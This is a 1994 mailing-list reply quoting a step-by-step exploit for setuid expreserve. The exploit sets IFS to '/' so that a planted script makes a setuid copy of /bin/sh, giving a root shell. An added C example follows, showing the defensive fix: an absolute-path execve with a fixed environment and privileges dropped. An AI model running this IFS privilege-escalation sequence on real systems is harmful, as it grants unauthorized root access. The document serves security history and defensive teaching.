Re: chmod 000 .rhosts - works?

jsz (jsz@ramon.bgu.ac.il)
Sat, 15 Oct 94 16:17:00 IST

> 
> ObBug: vi runs expreserve when it crashes or you type ':pre' (on some
>   versions).  Expreserve is setuid root.  Expreserve runs /bin/mail
>   with 'system()'.  So, do the following:
>     % cd /tmp
>     % cp /bin/sh fubar
>     % cat > bin
>     chmod 4755 fubar
>     ^D
>     % chmod u+x fubar
>     % setenv IFS=/
>     % vi
>     :pre
>     :q
>     % fubar
>     #

It has been known since 1986? You'll find IRIX 4.0.X vulnerable to it,
but expreserve is sgid sys, so you'd get access to read kmem tables --

Regards

----
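
Added example, not part of the original post and not expreserve's own source: the defensive counterpart to the system() call described in the quoted report, where a privileged program starts its helper by absolute path with execve(), no shell, and a constant environment, so IFS and PATH set by the invoking user never reach the child. The names run_helper and CLEAN_ENV are hypothetical, and dropping privilege before the exec is an assumption about what the helper needs.

```c
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Constant environment for the child (hypothetical name). Nothing is
 * inherited, so caller-supplied IFS, PATH, LD_* etc. are discarded. */
static char *const CLEAN_ENV[] = { "PATH=/usr/bin:/bin", "IFS= \t\n", NULL };

/* Run a helper given by absolute path, without a shell.
 * Returns the helper's exit status, or -1 on any failure. */
int run_helper(const char *path, char *const argv[])
{
    if (path == NULL || path[0] != '/')   /* refuse PATH-relative names */
        return -1;

    pid_t pid = fork();
    if (pid < 0)
        return -1;

    if (pid == 0) {
        /* Drop set-id privilege for good before exec. Group first:
         * after setuid() the process may no longer change its gid. */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(126);
        /* execve() does no word splitting, so IFS cannot change
         * which program is started. */
        execve(path, argv, CLEAN_ENV);
        _exit(127);                       /* exec failed */
    }

    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    /* Constructed hostile settings, mirroring the quoted report. */
    setenv("IFS", "/", 1);
    setenv("PATH", "/tmp", 1);
    /* /bin/sh is used here only to print what the child received. */
    char *argv[] = { "sh", "-c", "echo \"child PATH=$PATH\"", NULL };
    return run_helper("/bin/sh", argv);
}
```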